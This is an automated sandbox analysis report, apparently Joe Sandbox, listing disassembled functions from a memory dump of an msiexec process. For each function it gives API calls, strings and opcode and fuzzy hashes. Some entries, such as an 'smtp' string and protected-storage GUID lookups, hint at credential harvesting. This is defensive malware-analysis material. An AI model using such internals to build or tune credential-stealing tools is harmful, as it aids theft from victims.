                                                                                                        Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                        • API String ID: 3510742995-3170954634
                                                                                                        • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                        • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                        • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                        • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                        Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID: winWrite1$winWrite2
                                                                                                        • API String ID: 438689982-3457389245
                                                                                                        • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                        • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                        • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                        • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                        Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: winRead
                                                                                                        • API String ID: 1297977491-2759563040
                                                                                                        • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                        • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                        • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                        • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                        Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0044955B
                                                                                                        • memset.MSVCRT ref: 0044956B
                                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: gj
                                                                                                        • API String ID: 1297977491-4203073231
                                                                                                        • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                        • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                        • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                        • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                        Function 0040C143 Relevance: 7.6, APIs: 5, Instructions: 54clipboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                        • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                        • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                        • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 1189762176-0
                                                                                                        • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                        • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                        • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                        • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                        Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 004090C2
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 4247780290-0
                                                                                                        • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                        • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                        • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                        • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                        Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                          • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                          • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                        • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                        • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2775283111-0
                                                                                                        • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                        • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                        • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                        • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                        Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                        • API String ID: 885266447-2471937615
                                                                                                        • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                        • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                        • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                        • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                        Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _strcmpi.MSVCRT ref: 0040E134
                                                                                                        • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                        • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcmpi$_mbscpy
                                                                                                        • String ID: smtp
                                                                                                        • API String ID: 2625860049-60245459
                                                                                                        • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                        • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                        • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                        • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                        Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040C28C
                                                                                                        • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                          • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FocusMessagePostmemset
                                                                                                        • String ID: S_@$l
                                                                                                        • API String ID: 3436799508-4018740455
                                                                                                        • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                        • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                        • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                        • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                        Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004092C0
                                                                                                        • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                        Strings
                                                                                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString_mbscpymemset
                                                                                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                        • API String ID: 408644273-3424043681
                                                                                                        • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                        • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                        • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                        • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                        Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy
                                                                                                        • String ID: C^@$X$ini
                                                                                                        • API String ID: 714388716-917056472
                                                                                                        • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                        • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                        • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                        • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                        Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                          • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                        • String ID: MS Sans Serif
                                                                                                        • API String ID: 3492281209-168460110
                                                                                                        • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                        • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                        • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                        • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                        Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassName_strcmpimemset
                                                                                                        • String ID: edit
                                                                                                        • API String ID: 275601554-2167791130
                                                                                                        • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                        • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                        • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                        • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                        Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strlen$_mbscat
                                                                                                        • String ID: 3CD
                                                                                                        • API String ID: 3951308622-1938365332
                                                                                                        • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                        • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                        • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                        • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                        Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: rows deleted
                                                                                                        • API String ID: 2221118986-571615504
                                                                                                        • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                        • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                        • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                        • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                        Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1860491036-0
                                                                                                        • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                        • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                        • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                        • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                        Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004048C2
                                                                                                        • memset.MSVCRT ref: 004048D6
                                                                                                        • memset.MSVCRT ref: 004048EA
                                                                                                        • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                        • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 368790112-0
                                                                                                        • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                        • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                        • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                        • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                        Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040D2C2
                                                                                                        • memset.MSVCRT ref: 0040D2D8
                                                                                                        • memset.MSVCRT ref: 0040D2EA
                                                                                                        • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                        • memset.MSVCRT ref: 0040D319
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 368790112-0
                                                                                                        • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                        • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                        • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                        • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                        Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __allrem.LIBCMT ref: 00425850
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                        • __allrem.LIBCMT ref: 00425933
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1992179935-0
                                                                                                        • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                        • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                        • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                        • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                        Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                        • too many SQL variables, xrefs: 0042C6FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                        • API String ID: 2221118986-515162456
                                                                                                        • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                        • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                        • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                        • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                        Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                        • memset.MSVCRT ref: 004026AD
                                                                                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                          • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                          • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
